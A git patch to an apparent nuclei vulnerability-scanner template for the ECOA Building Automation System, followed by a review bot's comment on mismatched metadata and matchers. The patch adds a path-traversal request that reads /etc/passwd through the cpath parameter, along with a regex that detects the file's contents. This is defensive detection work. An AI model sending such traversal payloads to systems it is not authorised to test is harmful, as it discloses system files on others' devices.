From 2e7e35eb70d295698132a42ac2b297b9d5be9e5c Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 25 Sep 2021 11:22:48 +0530
Subject: [PATCH] Update and rename ecoa-building-directory-traversal.yaml to ecoa-building-lfi.yaml
---
 ...ory-traversal.yaml => ecoa-building-lfi.yaml} | 16 +++++++---------
 1 file changed, 7 insertions(+), 9 deletions(-)
 rename vulnerabilities/other/{ecoa-building-directory-traversal.yaml => ecoa-building-lfi.yaml} (67%)
diff --git a/vulnerabilities/other/ecoa-building-directory-traversal.yaml b/vulnerabilities/other/ecoa-building-lfi.yaml
similarity index 67%
rename from vulnerabilities/other/ecoa-building-directory-traversal.yaml
rename to vulnerabilities/other/ecoa-building-lfi.yaml
index 0fa43d3146..fcaa63183d 100644
--- a/vulnerabilities/other/ecoa-building-directory-traversal.yaml
+++ b/vulnerabilities/other/ecoa-building-lfi.yaml
@@ -1,4 +1,4 @@
-id: ecoa-building-directory-traversal
+id: ecoa-building-lfi

 info:
 name: ECOA Building Automation System - Directory Traversal Content Disclosure
@@ -6,18 +6,16 @@ info:
 severity: high
 description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
 reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- tags: ecoa,traversal
+ tags: ecoa,lfi

 requests:
 - raw:
 - |
- GET /fmangersub?cpath=/ HTTP/1.1
+ GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
 Host: {{Hostname}}

 matchers:
- - type: word
- words:
- - "bacevent.elf"
- - "redown.elf"
- - "system.bin"
- condition: and
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
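Review bot: The `info` block is left describing a directory-listing disclosure (`name: ... Directory Traversal Content Disclosure`, and a description saying `cpath` discloses directory content), while the request and matcher in the second hunk now look for the contents of `/etc/passwd`. Only the id and tags say `lfi`, so a hit will be reported under a name and description that no longer match what the probe checks. If the cited advisory covers only directory listing, the new request may also stop flagging affected devices, so it is worth confirming the endpoint returns file contents before dropping the old word matcher. Separately, the new matcher rests on a body regex alone; pairing it with a status matcher under `matchers-condition: and`, as sketched below with assumed indentation, would tie a match to a successful response.

```yaml
    matchers-condition: and
    matchers:
      # … unchanged: regex matcher on body …
      - type: status
        status:
          - 200
```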